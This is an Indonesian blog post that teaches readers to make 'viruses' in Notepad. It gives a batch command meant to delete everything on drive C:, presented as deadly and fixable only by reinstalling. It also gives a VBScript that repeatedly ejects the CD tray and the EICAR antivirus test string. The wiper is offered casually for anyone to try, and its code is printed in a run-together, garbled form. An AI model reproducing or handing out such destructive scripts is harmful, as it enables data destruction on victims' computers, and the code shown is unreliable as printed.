Cara Mudah dan Cepat Membuat File Virus

Hai kamu, iyya kamu :D
Yuk kita bahas lagi tentang virus yang meneruskan tentang artikel sebelumnya yang hanya mendeskripsikan dan memperkenalkan tentang virus berbahaya, akan tetapi kali ini malah lebih berbahaya guys, karena kita tidak hanya mengenalkan saja jenis virus apakah itu akan tetapi kali ini akan kasih tau bagaimana cara membuatnya.
Kebanyakan virus hanya bisa dibuat oleh para hacker, akan tetapi kali ini anda pun juga dapat membuatnya sendiri loh karena cara pembuatan virus yang berbahaya ini cukup mudah untuk diterapkan. Daripada tambah penasaran dan berkepanjangan langsung aja yuk simak bagaimana cara membuatvirus yang mematikan tapi mudah dibuat di bawah ini:
Semua cara ini kita hanya membutuhkan notepad aja guys, cara membukanya bisa melalui start dan ketikkan notepad, cara yang lebih cepat yakni dengan meggunakan kombinasi tombol antara windows+R dan ketikkan notepad lalu enter.

1.Cara Buat Virus Berbahaya
Untuk membuatnya ini sangat simple sekali sob, kamu cukup untuk membuka notepad saja dan paste kode berikut ini “@Echo offDel C: *.* |y” (tanpa tanda petik), contohnya seperti ini:


Simpan dengan nama apapun asalkan dibelakang nama tersebut ditambahkan dengan “.BAT”, nah saat ini anda sudah berhasil membuat virus dimana yang bisa membuat semua data anda yang berada pada drive C: akan terhapus semuanya yang termasuk system juga, untuk atasi virus yang satu ini anda diwajibkan untuk menginstall ulang PC atau Laptop anda.

2.Cara Membuat Virus CD-ROM
Cara yang satu ini cukup unik dan gokil guys, dan cukup aman lah untuk dicoba pada komputer anda sendiri karena tidak akan menimbulkan effek yang cukup berbahaya. Virus yang satu ini kerjanya hanya meng-eject CD/DVD ROM anda, jadi meskipun anda menutupnya maka akan terbuka kembali. :D
Untuk membuatnya juga cukup mudah, anda cukup untuk membuka notepad dan paste code ini “Set oWMP = CreateObject(“WMPlayer.OCX.7”)Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
Setelah itu silahkan simpan code tersebut dimana saja. Lalu berikan nama (CD-ROM.vbs) nah sudah jadi nih file yang bisa dibilang juga sebagai kelompok virus, untuk mengaktifkannya anda cukup double click file tersebut dan sesaat CD-DVD ROM anda langsung ter-eject secara auto dan tidak bisa di close.
Namun jangan khawatir karena program tersebut bisa dihentikan dengan cara berikut:
-Buka Task Manager,
-Cari kode wscript.exe,
-Klik tulisan tersebut lalu klik end-task di pojok bawah
Maka dengan begitu program tersebut sudah berhenti dan anda bisa mentup DVD ROM dengan aman.

3.Cara Membuat Virus untuk Antivirus
Jangan bingung teman bagaimana maksut dari yang satu ini, jujur awalnya saya juga sedikit bingung akan tetapi sekarang udah tidak dan akan saya bagikan kepada kalian semuanya, sebenarnya virus yang satu ini tidak berbahaya sama sekali tapi hanya untuk menguji Ativirus yang terinstall di perangkat kita apakah sudah bekerja dengan baik atau belum.
Caranya yakni buka notepad lalu paste kode “X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*” tanpa tanda petik. Setelah itu berikan nama EICAR.COM, ketika file tersebut sudah tersimpan maka secara otomatis file tersebut juga akan dihapus oleh Aplikasi Antivirus yang sudah terinstall di PC kamu sebelumnya.

Nah, cukup sekian saja pembahasan tentang cara pembuatan virus dengan mudah layaknya seorang hacker. Perlu diingat kembali jangan mencoba secara sembarangan cara diatas, alangkah baiknya pahami dan pertimbangkan terlebih dahulu resiko yang akan terjadi nantinya.
Terimakasih atas waktu yang sudah diluangkan untuk membaca artikel tersebut jangan lupa baca yang lainnya hanya di mansurarrahmah.blogspot.com

Related Posts

0 Komentar untuk Cara Mudah dan Cepat Membuat File Virus